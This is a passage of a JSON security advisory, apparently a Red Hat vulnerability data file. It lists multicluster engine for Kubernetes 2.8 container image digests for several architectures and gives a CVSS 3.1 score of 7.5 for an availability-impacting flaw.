"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64",
